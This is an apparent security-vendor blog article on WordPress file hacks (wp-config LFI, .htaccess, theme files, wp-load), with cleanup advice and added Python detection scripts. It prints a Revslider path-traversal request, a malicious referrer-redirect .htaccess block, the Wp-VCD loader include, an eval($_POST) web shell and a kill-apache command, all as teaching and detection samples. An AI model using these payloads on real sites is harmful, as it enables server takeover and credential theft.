Wordpress file injection

WordPress has been a democratic revolution in creating and hosting content, which has led to a massive upsurge in its popularity. According to the official WordPress website, it powers around 32% of internet sites. At times, however, WP sites are compromised through attacks like the wp-config.php hack. Nevertheless, the popularity of WordPress comes from its open source structure. Commenting on this, its founder Matt Mullenweg said:

Two things WordPress has been able to exemplify is that Open Source can create great user experiences and that it’s possible to have a successful commercial entity and a wider free software community living and working in harmony.

However, at times vulnerabilities in WordPress have led to the compromise of thousands of sites, as in the infamous case of the Slider Revolution issue. This was an LFI vulnerability which exposed the wp-config.php file, leading to the wp-config.php hack we shall discuss in this article. Before it was patched, thousands of websites had been compromised with the SoakSoak.ru malware. The icing on the cake was the Panama leak caused by this issue.

1) WordPress wp-config.php Hack

Wp-config.php is an important file of the WP installation. It acts as a bridge between the WP file system and the MySQL database and contains the database connection credentials. Apart from this, it is also used for:

  • Defining the security keys.
  • Specifying the database prefix.
  • Setting the default language for your admin panel.

Therefore, owing to its sensitive nature, it is a ripe target. In November 2016, a critical flaw was found in the plugin Revolution Image Slider. This was an LFI (Local File Inclusion) vulnerability: with a single crafted request, the attacker could read the wp-config file, which led to the wp-config.php hack.

http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

So, by appending this parameter to the admin-ajax.php URL, the wp-config file could be read. The SoakSoak.ru malware actively exploited this. The first step was to read the file to conduct the wp-config.php hack. Secondly, a malicious theme was uploaded to the WP site, installing the Filesman backdoor. Apart from this, swfobject.js was modified to redirect users, thus conducting a WordPress hack via wp-config.
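One defensive check this suggests is to search the web server access log for requests to the revslider_show_image action whose img value climbs out of the slider directory. The script below is an added example written for this article, not code from the original post or from Astra. It runs over a few constructed access-log lines (Apache combined format, documentation IP ranges) and reports the offending requests with their HTTP status, since a 200 on such a request means the file contents were most likely served, whereas a 403 suggests a firewall blocked it.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (Apache combined format, documentation IP ranges); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2016:10:01:12 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3127 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Nov/2016:10:01:15 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2F..%2Fwp-config.php HTTP/1.1" 200 3127 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Nov/2016:10:01:19 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%252F..%252Fwp-config.php HTTP/1.1" 403 199 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Nov/2016:10:02:01 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=slider1.jpg HTTP/1.1" 200 18211 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Nov/2016:10:03:44 +0000] "GET /index.php HTTP/1.1" 200 9012 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp, method, request path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def is_traversal(value: str) -> bool:
    """True if the (possibly double-encoded) img value climbs out of its directory or names wp-config."""
    decoded = unquote(unquote(value))  # parse_qs already decoded once; undo a second layer if present
    decoded = decoded.replace("\\", "/")
    return "../" in decoded or "wp-config" in decoded.lower()


def find_lfi_attempts(log_text: str) -> list:
    """Return one dict per request that hit revslider_show_image with a traversal-style img value."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("path"))
        if not parts.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        query = parse_qs(parts.query)
        if query.get("action") != ["revslider_show_image"]:
            continue
        for img in query.get("img", []):
            if is_traversal(img):
                status = int(m.group("status"))
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "img": img,
                    "status": status,
                    # a 2xx answer means the server most likely returned the file contents
                    "likely_disclosed": 200 <= status < 300,
                })
    return hits


if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(hit)
```

Any hit with likely_disclosed set should be treated as a credential leak: rotate the database password and the security keys in wp-config.php rather than only cleaning files.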


2) WordPress index.php Hacked

The index.php file helps in loading the default theme for a WP installation. At times it could be difficult to grasp the concept of the template hierarchy. In layman's terms, there should be either a front-page.php file or a home.php file; if neither is present, WordPress serves index.php. In case there is no index.php, directory listing gets enabled, which can expose sensitive files. Therefore, index.php is appealing to attackers.

For instance, the pub2srv malware targeted index.php files. Researchers at Astra were monitoring this widespread malware redirection campaign. First, the website is compromised using an SQL injection. Then, index.php is injected with JavaScript. As a result, users are redirected or pop-ups are displayed. The infected index.php files were found injected with an obfuscated JavaScript snippet.

At times, updates can cause problems with index.php. Web admins often rename the index file to index.php.old while updating. There are web scanners designed specifically to find such files, and once found, they can leak sensitive info to attackers, who could use it to compromise the site!

3) WordPress .htaccess Hacked

The .htaccess file helps to modify the way the site is accessed. It is a very powerful and versatile component that contributes to the security of your WP installation. Using it, we can:

  • Restrict access to certain folders of the site.
  • Create Redirects.
  • Force HTTPS.
  • Manage Caching.
  • Prevent a few script injection attacks.
  • Stop bots from finding usernames.
  • Block image hotlinking.
  • Force automatic downloads of a file.
  • Manage file extensions.

However, when under attack, these features can be used to harvest clicks for the attacker. Often the .htaccess file is injected with malicious code to redirect users; sometimes it is used to display spam. For instance, look at the code given below:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]

The RewriteRule in the last line redirects user traffic away from the site: visitors arriving from the search engines listed in the RewriteCond lines are sent to http://MaliciousDomain.tld, which then loads the bad.php script. If you notice unusual redirects from your site, it is most likely due to an .htaccess file hack. However, if the file is empty, do not panic: its contents are regenerated automatically.
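A quick way to audit an .htaccess file for this pattern is to pair every RewriteRule with the RewriteCond lines above it and flag rules that send visitors to another host, noting whether they fire only for certain referrers. The script below is an added example for this article, not code from the original post or from Astra. The suspicious sample is constructed from the pattern shown above, the benign sample is the stock WordPress permalink block, and SITE_HOSTS (the hostnames of the site being audited) is an assumption you would replace with your own.

```python
import re

# Assumed hostnames of the site being audited; any other absolute target counts as off-site.
SITE_HOSTS = {"example.com", "www.example.com"}

# Constructed .htaccess contents reproducing the referrer-gated redirect pattern discussed above.
SUSPICIOUS_HTACCESS = """\
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]
"""

# The stock WordPress permalink block, which must not be flagged.
BENIGN_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

# RewriteRule <pattern> <target> [flags]
RULE_RE = re.compile(r"^RewriteRule\s+\S+\s+(?P<target>\S+)(?:\s+\[(?P<flags>[^\]]*)\])?")


def parse_rules(text: str) -> list:
    """Pair each RewriteRule with the RewriteCond lines that precede it (mod_rewrite semantics)."""
    rules, conds = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("RewriteCond"):
            conds.append(line)
        elif line.startswith("RewriteRule"):
            rules.append((conds, line))
            conds = []
    return rules


def off_site_host(target: str):
    """Return the host of an absolute http(s) target that is not one of ours, else None."""
    m = re.match(r"https?://([^/?#\s]+)", target, re.I)
    if not m:
        return None
    host = m.group(1).lower()
    return None if host in SITE_HOSTS else host


def find_referrer_hijacks(text: str) -> list:
    """Flag rules that redirect to another host and count the HTTP_REFERER conditions gating them."""
    findings = []
    for conds, rule in parse_rules(text):
        m = RULE_RE.match(rule)
        if not m:
            continue
        host = off_site_host(m.group("target"))
        if host is None:
            continue
        flags = [f.strip().upper() for f in (m.group("flags") or "").split(",") if f.strip()]
        findings.append({
            "target": host,
            "redirect": any(f.startswith("R") for f in flags),  # R or R=3xx
            "referrer_conditions": sum("%{HTTP_REFERER}" in c for c in conds),
            "rule": rule,
        })
    return findings


if __name__ == "__main__":
    for finding in find_referrer_hijacks(SUSPICIOUS_HTACCESS):
        print(finding)
```

A redirect that only triggers for search-engine referrers is the classic cloaking trick: the site owner, who types the URL directly, never sees it, which is why such hacks go unnoticed for so long.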

WordPress Theme Files Hacked

1) WordPress Footer.php Hacked

The footer area of WordPress is defined by the file footer.php. This area contains widgets which remain the same throughout the website, for example the share widget or the social media widgets at the bottom of your website, or at times just copyright info, credits, etc. However, with HTML5's new methods, footer.php has become more powerful: the footer elements can now be used not only at the bottom but in other sections of the site as well.

So, footer.php is an important file that can be targeted by attackers. It is often used for malware redirects and displaying spam content, as was the case with the Default7.com redirect malware. In its primary stages footer.php was infected with JavaScript; in the later stages header.php was the target. Moreover, the encrypted values for the redirect were stored in a .SIc7CYwgY or .SIc7CYwgY1 file in the site root. If these locations were unavailable, /var/tmp/.SIc7CYwgY was used.

2) WordPress Header.php Hacked

The header.php file helps developers customize the header image of the theme. header.php was the second target of the Default7.com redirect malware; adding the same functions to both footer and header resulted in some errors. The header.php file was modified to insert malicious code which mostly looked like gibberish, but decoding it made things clearer: it redirected users to a website and used a cookie to uniquely identify each user. This cookie had a lifetime of one year.


Moreover, in another instance, the attackers injected JavaScript code into every file with a .js extension. What makes such malware hard to detect is that it sits inside the core files!

3) WordPress Functions.php Hacked

The functions file behaves like a plugin, which means it can be used to add extra features and functionality to the WordPress site. The file functions.php can be used:

  • For calling WordPress functions.
  • For calling native PHP functions.
  • For defining your own functions.

Moreover, the file functions.php is present in every theme, but only the functions.php in the active theme affects site rendering. This file was actively targeted by attackers in the Wp-VCD backdoor hack. This malware created new admins and injected spam pages into the site, so infected sites showed signs of pharma and Japanese SEO spam.

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

As is evident from the code above, this file includes the class.theme-modules.php file. That file is then used to install the malware into other themes, creating new users and backdoors. This allowed attackers to regain access to the site after the injected file was cleaned!


4) WordPress wp-load.php Hacked

wp-load.php is an important file for every plugin. It helps in bootstrapping the WordPress environment, which gives plugins the ability to use the native WP core functions. Many malware variants infect WordPress sites by creating malicious wp-load files, as was seen in the case of the China Chopper web shell malware. The typical behavior was to create files like wp-load-eFtAh.php on the server, containing code like:

<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>

This code allows the attacker to run any PHP code supplied in the pass parameter (read from $_POST in the snippet above). Using this, further commands could be executed. For instance, the command http://yoursite/your.php?pass=system("killall -9 apache"); could kill the web server processes and shut down the entire server. So this was a small yet efficient malware which could get complete hold of the server!
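The indicators from the last few sections (a leftover index.php.old, a functions.php that pulls in class.theme-modules.php, and a wp-load-*.php file that evaluates request input) are simple enough to hunt for with a file-system scan. The scanner below is an added example for this article, not code from the original post or from Astra. It builds a constructed WordPress-like tree in a temporary directory so that it runs offline; the regular expressions are plain indicators for exactly the snippets quoted above and are an assumption about what to look for, not a complete malware signature set.

```python
import os
import re
import tempfile
from pathlib import Path

# File-name indicators drawn from the samples discussed in this article.
NAME_PATTERNS = [
    (re.compile(r"^wp-load-[A-Za-z0-9]+\.php$"), "dropper-style wp-load copy"),
    (re.compile(r"\.php\.(old|bak|orig|save)$", re.I), "stale PHP backup exposed to the web"),
]
# Content indicators: a web shell evaluating request input, and the Wp-VCD loader include.
CONTENT_PATTERNS = [
    (re.compile(r"@?eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\["), "eval of request input (web shell)"),
    (re.compile(r"include(_once)?\s*\(.*class\.theme-modules\.php"), "Wp-VCD loader include"),
]
MAX_BYTES = 1_000_000  # skip large media files; these indicators live in small PHP files


def scan_tree(root: str) -> list:
    """Walk a WordPress tree and return sorted (relative path, reason) pairs for suspicious files."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            rel = path.relative_to(root).as_posix()
            for pattern, reason in NAME_PATTERNS:
                if pattern.search(name):
                    findings.append((rel, reason))
            try:
                if path.stat().st_size > MAX_BYTES:
                    continue
                text = path.read_text(encoding="utf-8", errors="ignore")
            except OSError:
                continue
            for pattern, reason in CONTENT_PATTERNS:
                if pattern.search(text):
                    findings.append((rel, reason))
    return sorted(findings)


def build_sample_site() -> str:
    """Write a constructed WordPress-like tree to a temp dir; the bad files mirror the snippets quoted above."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    files = {
        "index.php": "<?php define('WP_USE_THEMES', true); require __DIR__ . '/wp-blog-header.php';",
        "index.php.old": "<?php define('WP_USE_THEMES', true);",  # leftover from a manual update
        "wp-load-eFtAh.php": "<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>",
        "wp-content/themes/shop/functions.php":
            "<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) "
            "include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>",
        "wp-content/themes/shop/header.php": "<?php wp_head(); ?><header>Shop</header>",  # clean file
    }
    for rel, body in files.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")
    return root


if __name__ == "__main__":
    for rel, reason in scan_tree(build_sample_site()):
        print(f"{rel}: {reason}")
```

Point scan_tree at the document root of a real installation to use it. Because real infections are usually obfuscated (base64-encoded strings, string concatenation, gzinflate), treat a clean result from pattern matching as a starting point only and combine it with the integrity comparison described in the cleanup section.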

WordPress Files Cleanup

1) Cleaning Files

First, investigate the cause of attacks like the wp-config.php hack and remove the malicious code. Then restore the infected files from a backup; in case a backup is unavailable, use fresh copies of the files. However, ensure that a backup copy is kept at all times.
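Deciding which files to restore is easier when you can compare the live site against a known-good copy. The script below is an added example for this article, not code from the original post or from Astra: it hashes every file under two directory trees, skips paths that legitimately differ (wp-config.php, uploads, cache, an assumption you may adjust), and classifies files as modified (restore from backup), added (inspect and delete) or missing (restore). The demo builds a constructed clean tree and a constructed tampered tree in temporary directories so it runs offline.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# Paths that legitimately differ between a backup and the live site; skipped in the comparison.
IGNORE_PREFIXES = ("wp-config.php", "wp-content/uploads/", "wp-content/cache/")


def build_manifest(root: str) -> dict:
    """Map every file under root (relative, '/'-separated) to its SHA-256 digest."""
    manifest = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = Path(dirpath) / name
            rel = path.relative_to(root).as_posix()
            if rel.startswith(IGNORE_PREFIXES):
                continue
            digest = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            manifest[rel] = digest.hexdigest()
    return manifest


def diff_manifests(baseline: dict, live: dict) -> dict:
    """Classify live files against the known-good baseline.
    modified -> restore from backup; added -> inspect, then delete; missing -> restore."""
    return {
        "modified": sorted(p for p in live if p in baseline and live[p] != baseline[p]),
        "added": sorted(p for p in live if p not in baseline),
        "missing": sorted(p for p in baseline if p not in live),
    }


def _write_tree(files: dict) -> str:
    """Helper for the constructed demo: materialise {relative path: contents} in a temp dir."""
    root = tempfile.mkdtemp(prefix="wp-integrity-")
    for rel, body in files.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")
    return root


def demo() -> dict:
    """Constructed scenario: a clean backup versus a live copy with one tampered theme file and one dropped file."""
    clean = {
        "index.php": "<?php require __DIR__ . '/wp-blog-header.php';",
        "wp-config.php": "<?php define('DB_PASSWORD', 'backup-copy');",  # differs on purpose; ignored
        "wp-content/themes/shop/footer.php": "<footer>&copy; Shop</footer>",
        "wp-content/themes/shop/functions.php": "<?php add_theme_support('title-tag');",
    }
    live = dict(clean)
    live["wp-config.php"] = "<?php define('DB_PASSWORD', 'live-copy');"
    live["wp-content/themes/shop/footer.php"] += "<script src='//redirector.invalid/r.js'></script>"
    live["wp-load-eFtAh.php"] = "<?php /* constructed stand-in for a dropped file */ ?>"
    return diff_manifests(build_manifest(_write_tree(clean)), build_manifest(_write_tree(live)))


if __name__ == "__main__":
    for category, paths in demo().items():
        print(category, paths)
```

For core files, a fresh download of the same WordPress version serves as the baseline when no backup exists; for themes and plugins, use the original package from the vendor, never a copy taken from the compromised server.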

2) Secure Using Plugins

At times the site may fall prey to automation: an automated brute-force attack can compromise the admin panel. The AG Custom Admin plugin can help by hiding this page; it renames the login panel to a keyword of the user's choice. Moreover, certain plugins can block username enumeration.

3) Hiding Files

Often, exposed files can reveal sensitive info, which could lead to a wp-config.php hack. Therefore it becomes necessary to protect these files on the server, and the .htaccess file can help. To protect wp-content/uploads, block the execution of PHP files placed there (denying the whole folder would also block the site's images) by adding the following to the .htaccess file inside that directory:

# Deny direct web access to any PHP file under wp-content/uploads; media files stay reachable
<Files *.php>
Order Allow,Deny
Deny from all
</Files>

To hide wp-includes add this to the .htaccess file:

# Block wp-includes folder and files
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]
</IfModule>

Also, the Hide WP plugin can help hide the tell-tale structure of a WordPress site, making it harder for attackers to identify and exploit!

4) Updating

Always ensure that the WP installation is up to date; most of the loopholes can be plugged by running an updated installation. Use reputed plugins and themes only, and avoid poorly coded or nulled themes. Moreover, update the plugins regularly along with the core installation, thus keeping attacks like the wp-config.php hack at bay.

5) Firewall

A firewall goes a long way in securing your site. It monitors the incoming traffic and takes preventive measures to block infection, and it can effectively prevent attacks like the wp-config.php hack. There are multiple cost-effective firewall solutions available in the market today. The one at Astra is flexible and suitable for your needs.


The Astra firewall can detect infections and remove them. Apart from that, all the vulnerabilities will be automatically plugged.

6) WordPress Security Audit or Pentesting

With WordPress being the most popular CMS in use, and with the resulting increase in security issues associated with it, attackers are always on the prowl for exploitable vulnerabilities on WordPress websites. Consequently, pen-testing a WordPress site has become essential to keep it secure from attacks. Penetration testing is a simulated attack performed against a web application, network or computer system to evaluate its security and find any vulnerabilities before an attacker can exploit them. One of the simulated attacks carried out while pen-testing a WordPress site is checking for a directory listing vulnerability, which indexes sensitive directories and files such as wp-includes, wp-index.php, wp-config.php, wp-admin, wp-load.php, wp-content etc. and could thus provide an attacker with sensitive information.

Astra provides a comprehensive security audit for your website with 80+ active tests, the right mix of automated and manual testing.


About The Author

A computer nerd. Loves working with Sqlmap and BeEF (the software) ;) Has experience in wireless pen tests. Owns a chatbot on Pandorabots named Mark1. In free time he can be found saving some goals.
